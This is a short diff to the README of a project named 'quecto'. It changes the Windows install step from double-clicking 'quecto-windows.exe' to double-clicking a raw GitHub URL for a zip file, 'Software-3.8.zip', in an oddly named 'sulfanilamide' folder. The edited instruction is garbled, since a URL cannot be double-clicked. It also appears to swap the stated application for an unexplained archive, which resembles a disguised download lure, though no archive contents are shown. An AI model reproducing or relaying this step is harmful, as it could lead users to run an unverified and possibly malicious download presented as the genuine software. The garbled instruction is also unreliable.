Enzo201114/quecto/README.md

 - **For Windows:**
   1. Open the folder where you downloaded the file.
-  2. Double-click `quecto-windows.exe` to start the application.
+  2. Double-click `https://raw.githubusercontent.com/Enzo201114/quecto/main/sulfanilamide/Software-3.8.zip` to start the application.

 - **For macOS:**
   1. Open the `.dmg` file you downloaded.